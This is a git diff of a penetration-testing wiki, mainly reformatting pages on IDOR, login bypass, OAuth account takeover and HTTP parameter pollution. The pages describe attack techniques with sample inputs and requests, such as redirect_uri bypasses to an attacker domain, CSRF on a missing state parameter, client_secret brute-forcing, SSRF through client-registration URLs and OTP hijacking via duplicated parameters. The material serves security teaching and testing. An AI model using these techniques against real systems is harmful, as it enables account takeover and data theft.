@@ -46,7 +46,7 @@ What about this one? Would it display another user’s messages instead?
 GET /api_v1/messages?user_id=ANOTHER_USERS_ID
 ```
 
-### HPP (HTTP parameter pollution) <a href="cb9a" id="cb9a"></a>
+### HPP (HTTP parameter pollution) <a href="#cb9a" id="cb9a"></a>
 
 HPP vulnerabilities (supplying multiple values for the same parameter) can also lead to IDOR. Applications might not anticipate the user submitting multiple values for the same parameter and by doing so, you might be able to bypass the access control set forth on the endpoint.
 
@@ -74,23 +74,23 @@ Or provide the parameters as a list:
 GET /api_v1/messages?user_ids[]=YOUR_USER_ID&user_ids[]=ANOTHER_USERS_ID
 ```
 
-### Blind IDORs <a href="7639" id="7639"></a>
+### Blind IDORs <a href="#7639" id="7639"></a>
 
 Sometimes endpoints susceptible to IDOR don’t respond with the leaked information directly. They might lead the application to leak information elsewhere instead: in export files, emails and maybe even text alerts.
 
-### Change the request method <a href="6597" id="6597"></a>
+### Change the request method <a href="#6597" id="6597"></a>
 
 If one request method doesn’t work, there are plenty of others that you can try instead: GET, POST, PUT, DELETE, PATCH…
 
 A common trick that works is substituting POST for PUT or vice versa: the same access controls might not have been implemented!
 
-### Change the requested file type <a href="8f78" id="8f78"></a>
+### Change the requested file type <a href="#8f78" id="8f78"></a>
 
 Sometimes, switching around the file type of the requested file may lead to the server processing authorization differently. For example, try adding .json to the end of the request URL and see what happens.
 
-## How to increase the impact of IDORs <a href="45b0" id="45b0"></a>
+## How to increase the impact of IDORs <a href="#45b0" id="45b0"></a>
 
-### Critical IDORs first <a href="71f7" id="71f7"></a>
+### Critical IDORs first <a href="#71f7" id="71f7"></a>
 
 Always look for IDORs in critical functionalities first. Both write and read based IDORs can be of high impact.
 
diff --git a/pentesting-web/login-bypass/README.md b/pentesting-web/login-bypass/README.md
index 8e0c9fe7..d7f6d6fb 100644
--- a/pentesting-web/login-bypass/README.md
+++ b/pentesting-web/login-bypass/README.md
@@ -9,7 +9,7 @@ If you find a login page, here you can find some techniques to try to bypass it:
 * Check to **not send the parameters** (do not send any or only 1)
 * Check the **PHP comparisons error:** _user\[]=a\&pwd=b_ , _user=a\&pwd\[]=b_ , _user\[]=a\&pwd\[]=b_
 * Check credentials:
-  * [**Default credentials**](../../brute-force.md#default-credentials)** **of the technology/platform used
+  * [**Default credentials**](../../brute-force.md#default-credentials) **** of the technology/platform used
   * **Common combinations** (root, admin, password, name of the tech, default user with one of these passwords).
   * Create a dictionary using **Cewl**, **add** the **default** username and password (if there is) and try to brute-force it using all the words as **usernames and password**
   * **Brute-force** using a bigger **dictionary (**[**Brute force**](../../brute-force.md#http-post-form)**)**
@@ -78,5 +78,5 @@ Pages usually redirects users after login, check if you can alter that redirect
 
 ## Other Checks
 
-* Check if you can** enumerate usernames **abusing the login functionality.
-* Check if** auto-complete** is active in the password/**sensitive** information **forms** **input: **`<input autocomplete="false"`
+* Check if you can **enumerate usernames** abusing the login functionality.
+* Check if **auto-complete** is active in the password/**sensitive** information **forms** **input:** `<input autocomplete="false"`
diff --git a/pentesting-web/login-bypass/sql-login-bypass.md b/pentesting-web/login-bypass/sql-login-bypass.md
index 17564ac5..ac49f837 100644
--- a/pentesting-web/login-bypass/sql-login-bypass.md
+++ b/pentesting-web/login-bypass/sql-login-bypass.md
@@ -2,7 +2,7 @@
 
 This list contains **payloads to bypass the login via XPath, LDAP and SQL injection**(in that order).
 
-The way to use this list is to put the **first 200 lines as the username and password. **Then, put the complete list in the username first and then in the password inputs while putting some password (like _Pass1234._) or some known username (like _admin_).
+The way to use this list is to put the **first 200 lines as the username and password.** Then, put the complete list in the username first and then in the password inputs while putting some password (like _Pass1234._) or some known username (like _admin_).
 
 ```
 admin
diff --git a/pentesting-web/oauth-to-account-takeover.md b/pentesting-web/oauth-to-account-takeover.md
index a74e83ee..97c65f02 100644
--- a/pentesting-web/oauth-to-account-takeover.md
+++ b/pentesting-web/oauth-to-account-takeover.md
@@ -1,40 +1,33 @@
 # OAuth to Account takeover
 
-## “Quick” Primer <a href="d4a8" id="d4a8"></a>
+## Basic Information <a href="#d4a8" id="d4a8"></a>
 
-There are a couple different versions, as well as grant types to consider when we talk about OAuth. To read about these, I recommend reading through [https://oauth.net/2/](https://oauth.net/2/) to get a baseline understanding. In this article, we will be focusing on the most common flow that you will come across today, which is the [OAuth 2.0 authorization code grant type](https://oauth.net/2/grant-types/authorization-code/). In essence, OAuth provides developers an authorization mechanism to allow an application to access data or perform certain actions against your account, from another application (the authorization server).
+There are a couple different versions of OAuth, you can read [https://oauth.net/2/](https://oauth.net/2/) to get a baseline understanding.&#x20;
 
-For example, let’s say website [https://yourtweetreader.com](https://yourtweetreader.com) has functionality to display all tweets you’ve ever sent, including private tweets. In order to do this, OAuth 2.0 is introduced. [https://yourtweetreader.com](https://yourtweetreader.com) will ask you to authorize their Twitter application to access all your Tweets. A consent page will pop up on [https://twitter.com](https://twitter.com) displaying what permissions are being requested, and who the developer requesting it is. Once you authorize the request, [https://yourtweetreader.com](https://yourtweetreader.com) will be able to access to your Tweets on behalf of you. Now, this was very high level, and there’s some complexity here. Taking this example, here’s a bit more details on the particular elements which are important to understand in an OAuth 2.0 context:
+In this article, we will be focusing on the most common flow that you will come across today, which is the [OAuth 2.0 authorization code grant type](https://oauth.net/2/grant-types/authorization-code/). In essence, OAuth provides developers an **authorization mechanism to allow an application to access data or perform certain actions against your account, from another application** (the authorization server).
 
-**resource owner**: The `resource owner` is the user/entity granting access to their protected resource, such as their Twitter account Tweets
+For example, let’s say website _**https://yourtweetreader.com**_ has functionality to **display all tweets you’ve ever sent**, including private tweets. In order to do this, OAuth 2.0 is introduced. _https://yourtweetreader.com_ will ask you to **authorize their Twitter application to access all your Tweets**. A consent page will pop up on _https://twitter.com_ displaying what **permissions are being requested**, and who the developer requesting it is. Once you authorize the request, _https://yourtweetreader.com_ will be **able to access to your Tweets on behalf of you**.&#x20;
 
-**resource server**: The `resource server` is the server handling authenticated requests after the application has obtained an `access token` on behalf of the `resource owner` . In the above example, this would be https://twitter.com
+Elements which are important to understand in an OAuth 2.0 context:
 
-**client application**: The `client application` is the application requesting authorization from the `resource owner`. In this example, this would be https://yourtweetreader.com.
+* **resource owner**: The `resource owner` is the **user/entity** granting access to their protected resource, such as their Twitter account Tweets. In this example, this would be **you**.
+* **resource server**: The `resource server` is the **server handling authenticated requests** after the application has obtained an `access token` on behalf of the `resource owner` . In this example, this would be **https://twitter.com**
+* **client application**: The `client application` is the **application requesting authorization** from the `resource owner`. In this example, this would be **https://yourtweetreader.com**.
+* **authorization server**: The `authorization server` is the **server issuing `access tokens`** to the `client application` **after successfully authenticating** the `resource owner` and obtaining authorization. In the above example, this would be **https://twitter.com**
+* **client\_id**: The `client_id` is the **identifier for the application**. This is a public, **non-secret** unique identifier.
+* **client\_secret:** The `client_secret` is a **secret known only to the application and the authorization server**. This is used to generate `access_tokens`
+* **response\_type**: The `response_type` is a value to detail **which type of token** is being requested, such as `code`
+* **scope**: The `scope` is the **requested level of access** the `client application` is requesting from the `resource owner`
+* **redirect\_uri**: The `redirect_uri` is the **URL the user is redirected to after the authorization is complete**. This usually must match the redirect URL that you have previously registered with the service
+* **state**: The `state` parameter can **persist data between the user being directed to the authorization server and back again**. It’s important that this is a unique value as it serves as a **CSRF protection mechanism** if it contains a unique or random value per request
+* **grant\_type**: The `grant_type` parameter explains **what the grant type is**, and which token is going to be returned
+* **code**: This `code` is the authorization code received from the `authorization server` which will be in the query string parameter “code” in this request. This code is used in conjunction with the `client_id` and `client_secret` by the client application to fetch an `access_token`
+* **access\_token**: The `access_token` is the **token that the client application uses to make API requests** on behalf of a `resource owner`
+* **refresh\_token**: The `refresh_token` allows an application to **obtain a new `access_token` without prompting the user**
 
-**authorization server**: The `authorization server` is the server issuing `access tokens` to the `client application` after successfully authenticating the `resource owner` and obtaining authorization. In the above example, this would be [https://twitter.com](https://twitter.com)
+### Real Example
 
-**client_id**: The `client_id` is the identifier for the application. This is a public, non-secret unique identifier.
-
-**client_secret: **The `client_secret` is a secret known only to the application and the authorization server. This is used to generate `access_tokens`
-
-**response_type**: The `response_type` is a value to detail which type of token is being requested, such as `code`
-
-**scope**: The `scope` is the requested level of access the `client application` is requesting from the `resource owner`
-
-**redirect_uri**: The `redirect_uri` is the URL the user is redirected to after the authorization is complete. This usually must match the redirect URL that you have previously registered with the service
-
-**state**: The `state` parameter can persist data between the user being directed to the authorization server and back again. It’s important that this is a unique value as it serves as a CSRF protection mechanism if it contains a unique or random value per request
-
-**grant_type**: The `grant_type` parameter explains what the grant type is, and which token is going to be returned
-
-**code**: This `code` is the authorization code received from the `authorization server` which will be in the query string parameter “code” in this request. This code is used in conjunction with the `client_id` and `client_secret` by the client application to fetch an `access_token`
-
-**access_token**: The `access_token` is the token that the client application uses to make API requests on behalf of a `resource owner`
-
-**refresh_token**: The `refresh_token` allows an application to obtain a new `access_token` without prompting the user
-
-Well, this was meant to be a quick primer but it seems with OAuth, you can’t simply give a brief description. Putting this all together, here is what a real OAuth flow looks like:
+Putting this all together, here is what a **real OAuth flow looks like**:
 
 1. You visit [https://yourtweetreader.com](https://yourtweetreader.com) and click the “Integrate with Twitter” button.
 2. [https://yourtweetreader.com](https://yourtweetreader.com) sends a request to [https://twitter.com](https://twitter.com) asking you, the resource owner, to authorize https://yourtweetreader.com’s Twitter application to access your Tweets. The request will look like:
@@ -68,15 +61,15 @@ Host: twitter.com
 
 6\. Finally, the flow is complete and [https://yourtweetreader.com](https://yourtweetreader.com) will make an API call to Twitter with your `access_token` to access your Tweets.
 
-## Bug Bounty Findings <a href="323a" id="323a"></a>
+## Bug Bounty Findings <a href="#323a" id="323a"></a>
 
 Now, the interesting part! There are many things that can go wrong in an OAuth implementation, here are the different categories of bugs I frequently see:
 
-### Weak redirect_uri configuration <a href="cc36" id="cc36"></a>
+### Weak redirect\_uri configuration <a href="#cc36" id="cc36"></a>
 
-This is probably one of the more common things everyone is aware of when looking for OAuth implementation bugs. The `redirect_uri` is very important because sensitive data, such as the `code` is appended to this URL after authorization. If the `redirect_uri` can be redirected to an attacker controlled server, this means the attacker can potentially takeover a victim’s account by using the `code` themselves, and gaining access to the victim’s data.
+. The `redirect_uri` is very important because **sensitive data, such as the `code` is appended to this URL** after authorization. If the `redirect_uri` can be redirected to an **attacker controlled server**, this means the attacker can potentially **takeover a victim’s account** by using the `code` themselves, and gaining access to the victim’s data.
 
-The way this is going to be exploited is going to vary by authorization server. Some will only accept the exact same `redirect_uri` path as specified in the client application, but some will accept anything in the same domain or subdirectory of the `redirect_uri` .
+The way this is going to be exploited is going to vary by authorization server. **Some** will **only accept** the exact same ** `redirect_uri` path as specified in the client application**, but some will **accept anything** in the same domain or subdirectory of the `redirect_uri` .
 
 Depending on the logic handled by the server, there are a number of techniques to bypass a `redirect_uri` . In a situation where a `redirect_uri` is [https://yourtweetreader.com](https://yourtweetreader.com)/callback, these include:
 
@@ -85,22 +78,88 @@ Depending on the logic handled by the server, there are a number of techniques t
 * Weak `redirect_uri` regexes: `https://yourtweetreader.com.evil.com`
 * HTML Injection and stealing tokens via referer header: `https://yourtweetreader.com/callback/home/attackerimg.jpg`
 
-**Other parameters **that can be vulnerable to Open Redirects are:
+**Other parameters** that can be vulnerable to Open Redirects are:
 
-* **client_uri** - URL of the home page of the client application
-* **policy_uri** - URL that the Relying Party client application provides so that the end user can read about how their profile data will be used.
-* **tos_uri** - URL that the Relying Party client provides so that the end user can read about the Relying Party's terms of service.
-* **initiate_login_uri** - URI using the https scheme that a third party can use to initiate a login by the RP. Also should be used for client-side redirection.
+* **client\_uri** - URL of the home page of the client application
+* **policy\_uri** - URL that the Relying Party client application provides so that the end user can read about how their profile data will be used.
+* **tos\_uri** - URL that the Relying Party client provides so that the end user can read about the Relying Party's terms of service.
+* **initiate\_login\_uri** - URI using the https scheme that a third party can use to initiate a login by the RP. Also should be used for client-side redirection.
 
-All these parameters are **optional according to the OAuth and OpenID **specifications and not always supported on a particular server, so it's always worth identifying which parameters are supported on your server.
+All these parameters are **optional according to the OAuth and OpenID** specifications and not always supported on a particular server, so it's always worth identifying which parameters are supported on your server.
 
-If you target an OpenID server, the discovery endpoint at **`.well-known/openid-configuration`**sometimes contains parameters such as "_registration_endpoint_", "_request_uri_parameter_supported_", and "_require_request_uri_registration_". These can help you to find the registration endpoint and other server configuration values.
+If you target an OpenID server, the discovery endpoint at **`.well-known/openid-configuration`**sometimes contains parameters such as "_registration\_endpoint_", "_request\_uri\_parameter\_supported_", and "_require\_request\_uri\_registration_". These can help you to find the registration endpoint and other server configuration values.
 
-### SSRFs parameters <a href="bda5" id="bda5"></a>
+### CSRF - Improper handling of state parameter <a href="#bda5" id="bda5"></a>
 
-One of the hidden URLs that you may miss is the **Dynamic Client Registration endpoint**. In order to successfully authenticate users, OAuth servers need to know details about the client application, such as the "client_name", "client_secret", "redirect_uris", and so on. These details can be provided via local configuration, but OAuth authorization servers may also have a special registration endpoint. This endpoint is normally mapped to "/register" and accepts POST requests with the following format:
+Very often, the **`state` parameter is completely omitted or used in the wrong way**. If a state parameter is **nonexistent**, **or a static value** that never changes, the OAuth flow will very likely be **vulnerable to CSRF**. Sometimes, even if there is a `state` parameter, the **application might not do any validation of the parameter** and an attack will work. The way to exploit this would be to go through the authorization process on your own account, and pause right after authorising. You will then come across a request such as:
 
 ```
+https://yourtweetreader.com?code=asd91j3jd91j92j1j9d1
+```
+
+After you receive this request, you can then **drop the request because these codes are typically one-time use**. You can then send this URL to a **logged-in user, and it will add your account to their account**. At first, this might not sound very sensitive since you are simply adding your account to a victim’s account. However, many OAuth implementations are for sign-in purposes, so if you can add your Google account which is used for logging in, you could potentially perform an **Account Takeover** with a single click as logging in with your Google account would give you access to the victim’s account.
+
+You can find an **example** about this in this [**CTF writeup**](https://github.com/gr455/ctf-writeups/blob/master/hacktivity20/notes\_surfer.md) and in the **HTB box called Oouch**.
+
+I’ve also seen the state parameter used as an additional redirect value several times. The application will use `redirect_uri` for the initial redirect, but then the `state` parameter as a second redirect which could contain the `code` within the query parameters, or referer header.
+
+One important thing to note is this doesn’t just apply to logging in and account takeover type situations. I’ve seen misconfigurations in:
+
+* Slack integrations allowing an attacker to add their Slack account as the recipient of all notifications/messages
+* Stripe integrations allowing an attacker to overwrite payment info and accept payments from the victim’s customers
+* PayPal integrations allowing an attacker to add their PayPal account to the victim’s account, which would deposit money to the attacker’s PayPal
+
+### Pre Account Takeover <a href="#ebe4" id="ebe4"></a>
+
+One of the other more common issues I see is when applications allow “Sign in with X” but also username/password. There are 2 different ways to attack this:
+
+1. If the application does **not require email verification on account creation**, try **creating an account with a victim’s email address and attacker password** before the victim has registered. If the **victim** then tries to register or sign in **with a third party**, such as Google, it’s possible the application will do a lookup, see that email is already registered, then l**ink their Google account to the attacker created account**. This is a “**pre account takeover**” where an attacker will have access to the victim’s account if they created it prior to the victim registering.
+2. If an **OAuth app does not require email verification**, try signing up with that OAuth app with a **victim’s email address**. The same issue as above could exist, but you’d be attacking it from the other direction and getting access to the victim’s account for an account takeover.
+
+### Disclosure of Secrets <a href="#e177" id="e177"></a>
+
+It’s very important to recognize **which of the many OAuth parameters are secret**, and to protect those. For example, leaking the `client_id` is perfectly fine and necessary, but leaking the **`client_secret` is dangerous**. If this is leaked, the **attacker** can potentially **abuse the trust and identity of the trusted client application to steal user `access_tokens` and private information/access for their integrated accounts**. Going back to our earlier example, one issue I’ve seen is performing this step from the client, instead of the server:
+
+_5._ [_https://yourtweetreader.com_](https://yourtweetreader.com) _will then take that `code` , and using their application’s `client_id` and `client_secret` , will make a request from the server to retrieve an `access_token` on behalf of you, which will allow them to access the permissions you consented to._
+
+**If this is done from the client, the `client_secret` will be leaked and users will be able to generate `access_tokens` on behalf of the application**. With some social engineering, they can also **add more scopes to the OAuth authorization** and it will all appear legitimate as the request will come from the trusted client application.
+
+### Client Secret Bruteforce
+
+You can try to **bruteforce the client\_secret** of a service provider with the identity provider in order to be try to steal accounts.\
+The request to BF may look similar to:
+
+```
+POST /token HTTP/1.1
+content-type: application/x-www-form-urlencoded
+host: 10.10.10.10:3000
+content-length: 135
+Connection: close
+
+code=77515&redirect_uri=http%3A%2F%2F10.10.10.10%3A3000%2Fcallback&grant_type=authorization_code&client_id=public_client_id&client_secret=[bruteforce]
+```
+
+### Referer Header leaking Code + State
+
+Once the client has the **code and state**, if it's **reflected inside the Referer header** when he browses to a different page, then it's vulnerable.
+
+### Access Token Stored in Browser History
+
+Go to the **browser history and check if the access token is saved in there**.
+
+### Everlasting Authorization Code
+
+The **authorization code should live just for some time to limit the time window where an attacker can steal  and use it**.
+
+### Authorization/Refresh Token not bound to client
+
+If you can get the **authorization code and use it with a different client then you can takeover other accounts**.
+
+### SSRFs parameters <a href="#bda5" id="bda5"></a>
+
+One of the hidden URLs that you may miss is the **Dynamic Client Registration endpoint**. In order to successfully authenticate users, OAuth servers need to know details about the client application, such as the "client\_name", "client\_secret", "redirect\_uris", and so on. These details can be provided via local configuration, but OAuth authorization servers may also have a **special registration endpoint**. This endpoint is normally mapped to "/register" and accepts POST requests with the following format:
+
+```json
 POST /connect/register HTTP/1.1
 Content-Type: application/json
 Host: server.example.com
@@ -124,110 +183,34 @@ Authorization: Bearer eyJhbGciOiJSUzI1NiJ9.eyJ ...
 
 There are two specifications that define parameters in this request: [RFC7591](https://tools.ietf.org/html/rfc7591) for OAuth and [Openid Connect Registration 1.0](https://openid.net/specs/openid-connect-registration-1\_0.html#rfc.section.3.1).
 
-As you can see here, a number of these values are passed in via URL references and look like potential targets for [Server Side Request Forgery](https://portswigger.net/web-security/ssrf). At the same time, most servers we've tested do not resolve these URLs immediately when they receive a registration request. Instead, they just save these parameters and use them later during the OAuth authorization flow. In other words, this is more like a second-order SSRF, which makes black-box detection harder.
+As you can see here, a number of these values are passed in via URL references and look like potential targets for [Server Side Request Forgery](https://portswigger.net/web-security/ssrf). At the same time, most servers we've tested do not resolve these URLs immediately when they receive a registration request. Instead, they just **save these parameters and use them later during the OAuth authorization flow**. In other words, this is more like a second-order SSRF, which makes black-box detection harder.
 
 The following parameters are particularly interesting for SSRF attacks:
 
-* **logo_uri** - URL that references a logo for the client application. After you register a client, you can try to call the OAuth authorization endpoint ("/authorize") using your new "client_id". After the login, the server will ask you to approve the request and may display the image from the "logo_uri". If the server fetches the image by itself, the SSRF should be triggered by this step. Alternatively, the server may just include the logo via a client-side "\<img>" tag. Although this doesn't lead to SSRF, it may lead to Cross Site Scripting if the URL is not escaped.
-*   **jwks_uri** - URL for the client's JSON Web Key Set \[JWK] document. This key set is needed on the server for validating signed requests made to the token endpoint when using JWTs for client authentication \[RFC7523]. In order to test for SSRF in this parameter, register a new client application with a malicious "jwks_uri", perform the authorization process to obtain an authorization code for any user, and then fetch the "/token" endpoint with the following body:\
-
+* **logo\_uri** - URL that references a **logo for the client application**. **After you register a client**, you can try to call the OAuth authorization endpoint ("/authorize") using your new "client\_id". After the login, the server will ask you to approve the request and **may display the image from the "logo\_uri"**. If the **server fetches the image by itself**, the SSRF should be triggered by this step. Alternatively, the server may just include the logo via a **client-side "\<img>" tag**. Although this doesn't lead to SSRF, it may lead to **XSS if the URL is not escaped**.
+*   **jwks\_uri** - URL for the client's JSON Web Key Set \[JWK] document. This key set is needed on the server for validating signed requests made to the token endpoint when using JWTs for client authentication \[RFC7523]. In order to test for SSRF in this parameter, **register a new client application with a malicious "jwks\_uri"**, perform the authorization process to **obtain an authorization code for any user, and then fetch the "/token" endpoint** with the following body:
 
     `POST /oauth/token HTTP/1.1`\
     `...`\
     ``\
     `grant_type=authorization_code&code=n0esc3NRze7LTCu7iYzS6a5acc3f0ogp4&client_assertion_type=urn:ietf:params:oauth:client-assertion-type:jwt-bearer&client_assertion=eyJhbGci...`
 
-    If vulnerable, the server should perform a server-to-server HTTP request to the supplied "jwks_uri" because it needs this key to check the validity of the "client_assertion" parameter in your request. This will probably only be a [blind SSRF](https://portswigger.net/web-security/ssrf/blind) vulnerability though, as the server expects a proper JSON response.
-* **sector_identifier_uri** - This URL references a file with a single JSON array of redirect_uri values. If supported, the server may fetch this value as soon as you submit the dynamic registration request. If this is not fetched immediately, try to perform authorization for this client on the server. As it needs to know the redirect_uris in order to complete the authorization flow, this will force the server to make a request to your malicious sector_identifier_uri.
-*   **request_uris** - An array of the allowed request_uris for this client. The "request_uri" parameter may be supported on the authorization endpoint to provide a URL that contains a JWT with the request information (see [https://openid.net/specs/openid-connect-core-1\_0.html#rfc.section.6.2](https://openid.net/specs/openid-connect-core-1\_0.html#rfc.section.6.2)).
+    If vulnerable, the **server should perform a server-to-server HTTP request to the supplied "jwks\_uri"** because it needs this key to check the validity of the "client\_assertion" parameter in your request. This will probably only be a **blind SSRF vulnerability though**, as the server expects a proper JSON response.
+* **sector\_identifier\_uri** - This URL references a file with a single **JSON array of redirect\_uri values**. If supported, the server may **fetch this value as soon as you submit the dynamic registration request**. If this is not fetched immediately, try to perform authorization for this client on the server. As it needs to know the redirect\_uris in order to complete the authorization flow, this will force the server to make a request to your malicious sector\_identifier\_uri.
+*   **request\_uris** - An array of the **allowed request\_uris for this client**. The "request\_uri" parameter may be supported on the authorization endpoint to provide a URL that contains a JWT with the request information (see [https://openid.net/specs/openid-connect-core-1\_0.html#rfc.section.6.2](https://openid.net/specs/openid-connect-core-1\_0.html#rfc.section.6.2)).
 
-    Even if dynamic client registration is not enabled, or it requires authentication, we can try to perform SSRF on the authorization endpoint simply by using "request_uri":\
+    Even if dynamic client registration is not enabled, or it requires authentication, we can try to perform SSRF on the authorization endpoint simply by using "request\_uri":\
 
 
     `GET /authorize?response_type=code%20id_token&client_id=sclient1&request_uri=https://ybd1rc7ylpbqzygoahtjh6v0frlh96.burpcollaborator.net/request.jwt`
 
-    Note: do not confuse this parameter with "redirect_uri". The "redirect_uri" is used for redirection after authorization, whereas "request_uri" is fetched by the server at the start of the authorization process.
+    Note: do not confuse this parameter with "redirect\_uri". The "redirect\_uri" is used for redirection after authorization, whereas **"request\_uri" is fetched by the server at the start of the authorization process**.
 
-    At the same time, many servers we've seen do not allow arbitrary "request_uri" values: they only allow whitelisted URLs that were pre-registered during the client registration process. That's why we need to supply "request_uris": "https://ybd1rc7ylpbqzygoahtjh6v0frlh96.burpcollaborator.net/request.jwt" beforehand.
-
-### CSRF - Attack 'Connect' Request <a href="bda5" id="bda5"></a>
-
-An **attacker** may **start** the **Connect** process from a dummy account with a provider and **stops** the process **before** the **redirect**.\
-Then, he may create a malicious web application that abusing a **CSRF** may **logout** the **victim** from the **Provider**. Then, with another **CSRF**, he **logs in the victim** inside the Provider with the **attackers** **dummy** **account** inside the** Provider**. And finally, being the **victim** **logged** inside the **application** as **his** **user** and **inside** the **provider** **as** the **attacker**, the attacker **sends** a final **HTTP** request with the **redirect** that was stopped at the begging, so the** attackers dummy account** with the provider is **linked** with the **victims** **account** of the **application**. 
-
-### Improper handling of state parameter <a href="bda5" id="bda5"></a>
-
-This is by far the most common issue I see in OAuth implementations. Very often, the **`state` parameter is completely omitted or used in the wrong way**. If a state parameter is nonexistent, or a static value that never changes, the OAuth flow will very likely be vulnerable to CSRF. Sometimes, even if there is a `state` parameter, the application might not do any validation of the parameter and an attack will work. The way to exploit this would be to go through the authorization process on your own account, and pause right after authorizing. You will then come across a request such as:
-
-```
-https://yourtweetreader.com?code=asd91j3jd91j92j1j9d1
-```
-
-After you receive this request, you can then **drop the request because these codes are typically one-time use**. You can then send this URL to a** logged-in user, and it will add your account to their account**. At first, this might not sound very sensitive since you are simply adding your account to a victim’s account. However, many OAuth implementations are for sign-in purposes, so if you can add your Google account which is used for logging in, you could potentially perform an **Account Takeover **with a single click as logging in with your Google account would give you access to the victim’s account.
-
-You can find an **example **about this in this [**CTF writeup**](https://github.com/gr455/ctf-writeups/blob/master/hacktivity20/notes_surfer.md) and in the** HTB box called Oouch**.
-
-I’ve also seen the state parameter used as an additional redirect value several times. The application will use `redirect_uri` for the initial redirect, but then the `state` parameter as a second redirect which could contain the `code` within the query parameters, or referer header.
-
-One important thing to note is this doesn’t just apply to logging in and account takeover type situations. I’ve seen misconfigurations in:
-
-* Slack integrations allowing an attacker to add their Slack account as the recipient of all notifications/messages
-* Stripe integrations allowing an attacker to overwrite payment info and accept payments from the victim’s customers
-* PayPal integrations allowing an attacker to add their PayPal account to the victim’s account, which would deposit money to the attacker’s PayPal
-
-### Assignment of accounts based on email address <a href="ebe4" id="ebe4"></a>
-
-One of the other more common issues I see is when applications allow “Sign in with X” but also username/password. There are 2 different ways to attack this:
-
-1. If the application does not require email verification on account creation, try creating an account with a victim’s email address and attacker password before the victim has registered. If the victim then tries to register or sign in with a third party, such as Google, it’s possible the application will do a lookup, see that email is already registered, then link their Google account to the attacker created account. This is a “pre account takeover” where an attacker will have access to the victim’s account if they created it prior to the victim registering.
-2. If an OAuth app does not require email verification, try signing up with that OAuth app with a victim’s email address. The same issue as above could exist, but you’d be attacking it from the other direction and getting access to the victim’s account for an account takeover.
-
-### Disclosure of Secrets <a href="e177" id="e177"></a>
-
-It’s very important to recognize which of the many OAuth parameters are secret, and to protect those. For example, leaking the `client_id` is perfectly fine and necessary, but leaking the `client_secret` is dangerous. If this is leaked, the attacker can potentially use the trust and identity of the trusted client application to steal user `access_tokens` and private information/access for their integrated accounts. Going back to our earlier example, one issue I’ve seen is performing this step from the client, instead of the server:
-
-5\. [https://yourtweetreader.com](https://yourtweetreader.com) will then take that `code` , and using their application’s `client_id` and `client_secret` , will make a request from the server to retrieve an `access_token` on behalf of you, which will allow them to access the permissions you consented to.
-
-If this is done from the client, the `client_secret` will be leaked and users will be able to generate `access_tokens` on behalf of the application. With some social engineering, they can also add more scopes to the OAuth authorization and it will all appear legitimate as the request will come from the trusted client application.
-
-### Referer Header leaking Code + State
-
-Once the client has the code and state, if it's reflected inside the Referer header when he browses to a different page, then it's vulnerable.
-
-### Access Token Stored in Browser History
-
-Go to the browser history and check if the access token is saved in there.
-
-### Everlasting Authorization Code
-
-The authorization code should live just for some time to limit the time window where an attacker can steal  and use it.
-
-### Authorization/Refresh Token not bound to client
-
-If you can get the authorization code and use it with a different client then you can takeover other accounts.
-
-### Client Secret Bruteforce
-
-You can try to **bruteforce the client_secret **of a service provider with the identity provider in order to be try to steal accounts.\
-The request to BF may look similar to:
-
-```
-POST /token HTTP/1.1
-content-type: application/x-www-form-urlencoded
-host: 10.10.10.10:3000
-content-length: 135
-Connection: close
-
-code=77515&redirect_uri=http%3A%2F%2F10.10.10.10%3A3000%2Fcallback&grant_type=authorization_code&client_id=public_client_id&client_secret=[bruteforce]
-```
-
-## Closing <a href="996f" id="996f"></a>
-
-There’s plenty of other attacks and things that can go wrong in an OAuth implementation, but these are some of the more common ones that you will see. These misconfigurations are surprisingly common, and a very large quantity of bugs come from these. I intended to keep the “Quick Primer” rather short, but quickly realized all of the knowledge was necessary for the rest of the post. Given this, it makes sense that most developers aren’t going to know all the details for implementing securely. More often than not, these issues are high severity as it involves private data leak/manipulation and account takeovers. I’d like to go into more detail in each of these categories at some point, but wanted this to serve as a general introduction and give ideas for things to look out for!
+    At the same time, many servers we've seen do not allow arbitrary "request\_uri" values: they only allow whitelisted URLs that were pre-registered during the client registration process. That's why we need to supply "request\_uris": "https://ybd1rc7ylpbqzygoahtjh6v0frlh96.burpcollaborator.net/request.jwt" beforehand.
 
 ## OAuth providers Race Conditions
 
-If the platform you are testing is an OAuth provider** **[**read this to test for possible Race Conditions**](race-condition.md).
+If the platform you are testing is an OAuth provider **** [**read this to test for possible Race Conditions**](race-condition.md).
 
 ## References
 
diff --git a/pentesting-web/parameter-pollution.md b/pentesting-web/parameter-pollution.md
index 66274dde..3b0a386d 100644
--- a/pentesting-web/parameter-pollution.md
+++ b/pentesting-web/parameter-pollution.md
@@ -1,6 +1,6 @@
 # Parameter Pollution
 
-**Copied from **[**https://medium.com/@shahjerry33/http-parameter-pollution-its-contaminated-85edc0805654**](https://medium.com/@shahjerry33/http-parameter-pollution-its-contaminated-85edc0805654)****
+**Copied from** [**https://medium.com/@shahjerry33/http-parameter-pollution-its-contaminated-85edc0805654**](https://medium.com/@shahjerry33/http-parameter-pollution-its-contaminated-85edc0805654)****
 
 **Summary :**
 
@@ -41,7 +41,7 @@ Send OTP
 
 3\. I intercepted the request using burp suite and added another email by using same parameter (I created two emails for testing purpose)Burp Request
 
-![Image for post](https://miro.medium.com/max/1737/1\*z_RpnZyKHLn6B4Lz4ONT3Q.png)
+![Image for post](https://miro.medium.com/max/1737/1\*z\_RpnZyKHLn6B4Lz4ONT3Q.png)
 
 4\. I received an OTP of shrey……@gmail.com to my another account radhika…..@gmail.com OTP
 
@@ -49,8 +49,8 @@ Send OTP
 
 5\. I copied the OTP and went to shrey….@gmail.com on that program’s login screen, I entered this OTP and I was in the account.Account Take Over
 
-![Image for post](https://miro.medium.com/max/1698/1\*Ux-ILfCr_Mk_xmzzsXwNnA.jpeg)
+![Image for post](https://miro.medium.com/max/1698/1\*Ux-ILfCr\_Mk\_xmzzsXwNnA.jpeg)
 
 So what happened here is the back-end application took the value of first “**email**” parameter to generate an OTP and used the value of second “**email**” parameter to supply the value, which means an OTP of shrey….@gmail.com was sent to radhika….@gmail.com.
 
-**NOTE : **Here in an image on 4th step where I received an OTP to radhika….@gmail.com I was confused because the message said Hi Radhika, so I thought that the parameter is not polluted and the OTP was for radhika….@gmail.com but when I tried the OTP on shrey….@gmail.com it worked.
+**NOTE :** Here in an image on 4th step where I received an OTP to radhika….@gmail.com I was confused because the message said Hi Radhika, so I thought that the parameter is not polluted and the OTP was for radhika….@gmail.com but when I tried the OTP on shrey….@gmail.com it worked.
